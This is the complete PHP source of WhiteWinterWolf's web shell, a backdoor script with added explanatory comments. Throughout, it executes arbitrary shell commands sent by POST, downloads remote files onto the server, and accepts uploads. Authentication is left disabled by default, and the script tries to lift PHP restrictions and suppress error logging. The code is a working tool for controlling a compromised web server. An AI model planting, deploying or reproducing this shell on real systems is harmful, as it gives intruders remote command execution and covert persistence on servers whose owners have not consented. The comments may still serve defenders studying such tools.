  1. <?php
  2. /*******************************************************************************
  3.  * Copyright 2017 WhiteWinterWolf
  4.  * https://www.whitewinterwolf.com/tags/php-webshell/
  5.  *
  6.  * This file is part of wwwolf-php-webshell.
  7.  *
  8.  * wwwolf-php-webshell is free software: you can redistribute it and/or modify
  9.  * it under the terms of the GNU General Public License as published by
  10.  * the Free Software Foundation, either version 3 of the License, or
  11.  * (at your option) any later version.
  12.  *
  13.  * This program is distributed in the hope that it will be useful,
  14.  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  15.  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  16.  * GNU General Public License for more details.
  17.  *
  18.  * You should have received a copy of the GNU General Public License
  19.  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
  20.  ******************************************************************************/
  21.  
/*
 * Optional password settings.
 * Use the 'passhash.sh' script to generate the hash.
 * NOTE: the prompt value is tied to the hash!
 */
// Shown on the login form and also used as the HMAC key inside h(), which is
// why any previously generated $passhash stops matching when it changes.
$passprompt = "WhiteWinterWolf's PHP webshell: ";
// Empty by default: the authentication block below is skipped entirely while
// $passhash is empty, so as pasted this copy accepts commands from any client.
$passhash = "";
  29.  
// Echo $s HTML-escaped; ENT_QUOTES also escapes ' and ", which matters because
// the callers below place the value inside attribute values.
function e($s) { echo htmlspecialchars($s, ENT_QUOTES); }
  31.  
// Hex-encoded HMAC-SHA256 of $s keyed with the global $passprompt.
// Prefers ext/hash and falls back to the legacy mhash extension. The fallback
// is not guarded here, so h() errors out when neither extension is loaded;
// the top-level code checks for one of them before calling.
function h($s)
{
    global $passprompt;
    if (function_exists('hash_hmac'))
    {
        // raw_output defaults to false, so this is already a hex string.
        return hash_hmac('sha256', $s, $passprompt);
    }
    else
    {
        // mhash() returns raw bytes; bin2hex() makes both branches comparable.
        return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));
    }
}
  44.  
// Download "$host:$port$src" through PHP's URL stream wrappers (needs
// allow_url_fopen) and write it to the local path $dst.
// Returns an HTML status fragment built from the global $ok / $err markers;
// $host, $src and $dst are interpolated into that fragment unescaped.
function fetch_fopen($host, $port, $src, $dst)
{
    global $err, $ok;
    $ret = '';
    // Normalise the scheme: a bare host becomes http://, and socket-style
    // ssl:// or tls:// prefixes become https:// for the HTTP wrapper.
    if (strpos($host, '://') === false)
    {
        $host = 'http://' . $host;
    }
    else
    {
        $host = str_replace(array('ssl://', 'tls://'), 'https://', $host);
    }
    // fopen() on a URL returns false on failure; the warning it emits is
    // rendered into the page because the top-level code turns display_errors on.
    $rh = fopen("${host}:${port}${src}", 'rb');
    if ($rh !== false)
    {
        $wh = fopen($dst, 'wb');
        if ($wh !== false)
        {
            $cbytes = 0;
            // Copy in 1 KiB chunks; fwrite()'s return value is summed as the
            // byte count, so a failed write (false) simply adds 0.
            while (! feof($rh))
            {
                $cbytes += fwrite($wh, fread($rh, 1024));
            }
            fclose($wh);
            $ret .= "${ok} Fetched file <i>${dst}</i> (${cbytes} bytes)<br />";
        }
        else
        {
            $ret .= "${err} Failed to open file <i>${dst}</i><br />";
        }
        fclose($rh);
    }
    else
    {
        $ret = "${err} Failed to open URL <i>${host}:${port}${src}</i><br />";
    }
    return $ret;
}
  83.  
// Fallback for fetch_fopen() when allow_url_fopen cannot be enabled: opens a
// raw socket (https:// is mapped to tls://) and hand-writes a minimal HTTP/1.0
// GET. The response body is taken to be everything after the first blank
// line; the status line is never checked. Returns an HTML status fragment
// built the same way as fetch_fopen(), again with unescaped interpolation.
function fetch_sock($host, $port, $src, $dst)
{
    global $err, $ok;
    $ret = '';
    $host = str_replace('https://', 'tls://', $host);
    $s = fsockopen($host, $port);
    if ($s)
    {
        $f = fopen($dst, 'wb');
        if ($f)
        {
            $buf = '';
            // Read set for stream_select(); write/except sets are unused.
            $r = array($s);
            $w = NULL;
            $e = NULL;
            // Bare HTTP/1.0 request line, no Host or other headers.
            fwrite($s, "GET ${src} HTTP/1.0\r\n\r\n");
            // Keep reading until the peer closes or the socket stays silent
            // for 5 seconds (stream_select() returns 0 on timeout).
            while (stream_select($r, $w, $e, 5) && !feof($s))
            {
                $buf .= fread($s, 1024);
            }
            // Strip the response headers. If no header/body separator was
            // received, strpos() is false and the slice starts at offset 4.
            $buf = substr($buf, strpos($buf, "\r\n\r\n") + 4);
            fwrite($f, $buf);
            fclose($f);
            $ret .= "${ok} Fetched file <i>${dst}</i> (" . strlen($buf) . " bytes)<br />";
        }
        else
        {
            $ret .= "${err} Failed to open file <i>${dst}</i><br />";
        }
        fclose($s);
    }
    else
    {
        $ret .= "${err} Failed to connect to <i>${host}:${port}</i><br />";
    }
    return $ret;
}
  121.  
// --- Runtime setup ----------------------------------------------------------
// Errors are rendered into the page instead of the server log (log_errors
// off, display_errors on): warnings from fopen()/popen() appear inline and
// leave nothing in the PHP error log.
ini_set('log_errors', '0');
ini_set('display_errors', '1');
error_reporting(E_ALL);

// Discard every active output buffer (e.g. one opened by an including
// script) so the command output below is streamed straight to the client.
while (@ ob_end_clean());

// PHP 4 compatibility: alias the old long-form request arrays onto the
// superglobals used below.
if (! isset($_SERVER))
{
    global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
    $_FILES = &$HTTP_POST_FILES;
    $_POST = &$HTTP_POST_VARS;
    $_SERVER = &$HTTP_SERVER_VARS;
}

// --- Request parameters (all read from POST, used without validation) -------
$auth = '';
$cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];
// Working directory for chdir() and for fetch/upload destinations.
$cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];
// Name of the fetch implementation; may be switched to fetch_sock or cleared below.
$fetch_func = 'fetch_fopen';
// The fetch host defaults to the address of the client issuing this request.
$fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];
$fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];
$fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];
$pass = empty($_POST['pass']) ? '' : $_POST['pass'];
$url = $_SERVER['REQUEST_URI'];
$status = '';
// Status markers: HTML entities for smiling / warning / frowning faces.
$ok = '&#9786; :';
$warn = '&#9888; :';
$err = '&#9785; :';

// --- Optional authentication ------------------------------------------------
// Active only when $passhash is set. The client submits either the clear
// password ('pass', hashed here) or the hidden 'auth' token the main form
// carries forward; h() of that value must equal $passhash.
if (! empty($passhash))
{
    if (function_exists('hash_hmac') || function_exists('mhash'))
    {
        $auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];
        // Plain string comparison rather than hash_equals().
        if (h($auth) !== $passhash)
        {
            ?>
                <form method="post" action="<?php e($url); ?>">
                    <?php e($passprompt); ?>
                    <input type="password" size="15" name="pass">
                    <input type="submit" value="Send">
                </form>
            <?php
            exit;
        }
    }
    else
    {
        // The message names only mhash(), although hash_hmac() was checked too.
        $status .= "${warn} Authentication disabled ('mhash()' missing).<br />";
    }
}

// --- Attempts to lift php.ini restrictions at runtime -----------------------
// Each ini_set() is re-checked with ini_get(). allow_url_fopen and
// file_uploads are normally PHP_INI_SYSTEM, so these overrides are expected
// to fail on a default build and the fallbacks below are what matters.
if (! ini_get('allow_url_fopen'))
{
    ini_set('allow_url_fopen', '1');
    if (! ini_get('allow_url_fopen'))
    {
        // Raw-socket fetcher needs stream_select(); otherwise fetching is off.
        if (function_exists('stream_select'))
        {
            $fetch_func = 'fetch_sock';
        }
        else
        {
            $fetch_func = '';
            $status .= "${warn} File fetching disabled ('allow_url_fopen'"
                . " disabled and 'stream_select()' missing).<br />";
        }
    }
}
if (! ini_get('file_uploads'))
{
    ini_set('file_uploads', '1');
    if (! ini_get('file_uploads'))
    {
        $status .= "${warn} File uploads disabled.<br />";
    }
}
// ini_set() returns the old value on success and false on failure; at runtime
// open_basedir can normally only be tightened, so the warning usually fires
// and reports the restriction that stays in force.
if (ini_get('open_basedir') && ! ini_set('open_basedir', ''))
{
    $status .= "${warn} open_basedir = " . ini_get('open_basedir') . "<br />";
}

// Move to the requested directory; on failure fall back to the process cwd.
if (! chdir($cwd))
{
  $cwd = getcwd();
}

// Fetch: written under basename() of the requested path inside $cwd, via a
// variable function call to whichever fetcher was selected above.
if (! empty($fetch_func) && ! empty($fetch_path))
{
    $dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);
    $status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);
}

// Upload: stored under its client-supplied basename inside $cwd. A failed
// move_uploaded_file() produces no status line at all.
if (ini_get('file_uploads') && ! empty($_FILES['upload']))
{
    $dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
    if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))
    {
        $status .= "${ok} Uploaded file <i>${dest}</i> (" . $_FILES['upload']['size'] . " bytes)<br />";
    }
}
?>

<form method="post" action="<?php e($url); ?>"
    <?php if (ini_get('file_uploads')): ?>
        enctype="multipart/form-data"
    <?php endif; ?>
    >
    <?php if (! empty($passhash)): ?>
        <input type="hidden" name="auth" value="<?php e($auth); ?>">
    <?php endif; ?>
    <table border="0">
        <?php if (! empty($fetch_func)): ?>
            <tr><td>
                <b>Fetch:</b>
            </td><td>
                host: <input type="text" size="15" id="fetch_host" name="fetch_host" value="<?php e($fetch_host); ?>">
                port: <input type="text" size="4" id="fetch_port" name="fetch_port" value="<?php e($fetch_port); ?>">
                path: <input type="text" size="40" id="fetch_path" name="fetch_path" value="">
            </td></tr>
        <?php endif; ?>
        <tr><td>
            <b>CWD:</b>
        </td><td>
            <input type="text" size="50" id="cwd" name="cwd" value="<?php e($cwd); ?>">
            <?php if (ini_get('file_uploads')): ?>
                <b>Upload:</b> <input type="file" id="upload" name="upload">
            <?php endif; ?>
        </td></tr>
        <tr><td>
            <b>Cmd:</b>
        </td><td>
            <input type="text" size="80" id="cmd" name="cmd" value="<?php e($cmd); ?>">
        </td></tr>
        <tr><td>
        </td><td>
            <sup><a href="#" onclick="cmd.value=''; cmd.focus(); return false;">Clear cmd</a></sup>
        </td></tr>
        <tr><td colspan="2" style="text-align: center;">
            <input type="submit" value="Execute" style="text-align: right;">
        </td></tr>
    </table>
   
</form>
<hr />

<?php
// $status is accumulated raw HTML (markers plus unescaped paths/hosts).
if (! empty($status))
{
    echo "<p>${status}</p>";
}

// --- Command execution ------------------------------------------------------
echo "<pre>";
if (! empty($cmd))
{
    echo "<b>";
    e($cmd);
    echo "</b>\n";
    // popen() hands $cmd unmodified to the platform shell: on POSIX it is
    // prefixed with "exec 2>&1;" so stderr is merged into the pipe, on
    // Windows it is wrapped in cmd /C "..." 2>&1. A popen() failure is not
    // checked before the read loop below.
    if (DIRECTORY_SEPARATOR == '/')
    {
        $p = popen('exec 2>&1; ' . $cmd, 'r');
    }
    else
    {
        $p = popen('cmd /C "' . $cmd . '" 2>&1', 'r');
    }
    // Stream output as it arrives, HTML-escaped, flushing after each chunk
    // (errors from flush() are suppressed).
    while (! feof($p))
    {
        echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);
        @ flush();
    }
}
echo "</pre>";

// Terminate the request here; anything an including script would print
// after this point is never sent.
exit;
?>